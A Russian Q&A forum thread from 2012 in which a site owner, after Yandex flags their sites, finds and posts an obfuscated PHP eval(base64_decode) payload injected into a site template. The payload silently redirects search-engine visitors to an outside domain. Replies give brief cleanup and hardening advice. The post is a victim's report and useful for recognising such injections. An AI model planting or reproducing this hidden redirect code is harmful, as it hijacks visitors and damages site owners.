Задать вопрос
@odmin4eg

На сайте www.*****.ru обнаружен потенциально опасный код

Яндекс что-то поломал у себя, у меня половина сайтов на разных хостингах, на своих серверах, не важно где размещён сайт.

появляются вот такие сообщения.

а в webmaster.yandex.ru вообще картина маслом.

На сайте www.*****.ru обнаружен потенциально опасный код 4.02.2012
На сайте *****.su обнаружен потенциально опасный код 3.02.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 31.01.2012
На сайте *****.su обнаружен потенциально опасный код 28.01.2012
Перепроверка сайта *****.su не выявила потенциально опасного кода 25.01.2012
На сайте *****.su обнаружен потенциально опасный код 25.01.2012
Перепроверка сайта www.*****.ru не выявила потенциально опасного кода 20.01.2012
На сайте www.*****.ru обнаружен потенциально опасный код 14.01.2012


за свои сервера ручаюь и антивирусами и сам код проверял и руткиты, сервер свежий, ограничения доступа есть.
левого кода в ХТМЛ отдаче нету.
с помощью этого сервиса www.bertal.ru
ставлю юзерагент яндекса тыкаю проверку, обычный чистый хтмл код без примесей.

В общем пичалька.

тем временем сайт выпал из выдачи, поток клиентов скатился на минимум.

В притом подробностей нету какой конкретно код он нашёл.
То есть на лицо факт что, как такового вируса нет, а яндекс ругается на гугла аналистик?

В общем это я лошаро, полез передвинуть скрипты гугла анлистика, а там ахтунг

<img src="<?php         eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcW
F6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR
0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZ
XIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0
cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIs
Im5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc
3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0
cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylc
JmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0
cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwi
aW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaW5kdXN0cnkuYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ
0KfQ0KfQ0KfQ==")); echo $this->baseurl ?>


и т.п.

начал копать когда в бэкапах изменился этот скрипт, а получилось, что изменился он в момент перезда с одхого хостинга на другой, перезаливал клиент, и сайт выливался с одного хостинга нормальный, а заливался на другой хостинг уже с изменёнными скриптами

Хотя это по одному сайту, непонятно что по второму.
  • Вопрос задан
  • 3055 просмотров
Подписаться 2 Оценить 1 комментарий
Пригласить эксперта
Ответы на вопрос 7
@galanthus
не пробовали зайти с андройда? может оперу попросят обновить?
Ответ написан
Комментировать
@bondbig
Эээ, а где вопрос? Мы же в Q&A, верно?
Ответ написан
@YourChief
откуда инфа, что брутфорсом, а не что вас протроянили?
Ответ написан
petushok
@petushok
А вопрос где? Такие вещи нужно писать в блог «Я негодую».
Ответ написан
Комментировать
@shagguboy
прогони clamAV
Ответ написан
Комментировать
GrassNetworks
@GrassNetworks
Дружище, разобрался что с другими сайтами?
Ответ написан
dobersoft
@dobersoft
pastebin.com/M3eNERp7 — отловил вредоносный код, поместив сохранялку на место выполнялки.
Рекомендации:
— не держать все яйца в одной корзине
— вебмастеров, которые просят поставить права 0777, бить по рукам
— использовать хорошие пароли
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы